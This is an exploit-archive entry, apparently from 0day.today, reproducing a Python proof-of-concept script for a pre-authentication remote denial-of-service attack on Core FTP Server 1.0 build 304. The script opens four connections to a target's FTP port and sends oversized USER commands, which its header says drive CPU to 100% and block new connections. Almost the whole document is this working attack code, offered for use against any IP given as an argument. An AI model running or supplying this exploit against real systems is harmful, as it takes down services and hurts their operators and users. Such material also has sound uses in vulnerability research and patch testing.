Core FTP Server 1.0 build 304 DoS

2009-09-28T00:00:00
ID 1337DAY-ID-9747
Type zdt
Reporter Dr_IDE
Modified 2009-09-28T00:00:00

Description

Exploit for unknown platform in category dos / poc

                                        
                                            =================================
Core FTP Server 1.0 build 304 DoS
=================================

# Title: Core FTP Server 1.0 build 304 DoS
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Dr_IDE
# Published: 2009-09-28
# Verified: yes

view source
print?
#!/usr/bin/env python
 
###################################################################################
#
# Core FTP Server 1.0, build 304 Remote Denial of Service Exploit (Pre Auth)
# Found By:     Dr_IDE
# Tested On:    Windows XPSP3
# Download:     http://www.coreftp.com/server/
# Notes:    This will cause CPU usage to go to 100% and prevent new connections
# Usage:    ./script <Target IP>
#
###################################################################################
 
import socket, sys
 
def banner():
    print "\n##################################################################"
    print "#                                                                #"
    print "#     Core FTP Server 1.0, build 304 Remote DoS Exploit          #"
    print "#                       by Dr_IDE                                #"
    print "#                                #"
    print "##################################################################\n"
 
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s4 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
 
buff = ("\x41" * 2048);
 
try:
    banner();
    print ("[*] Connecting to target...");
    s1.connect((sys.argv[1] , 21));
    s2.connect((sys.argv[1] , 21));
    s3.connect((sys.argv[1] , 21));
    s4.connect((sys.argv[1] , 21));
    print ("[*] Sending evil stuff...");
    s1.send("USER " + buff + "\r\n");
    s2.send("USER " + buff + "\r\n");
    s3.send("USER " + buff + "\r\n");
    s4.send("USER " + buff + "\r\n");  
    print ("[*] Success! The server should now be inaccessible");
    s1.close();
    s2.close();
    s3.close();
    s4.close();
 
except:
    print ("[-] Could not connect to server.");



#  0day.today [2018-04-09]  #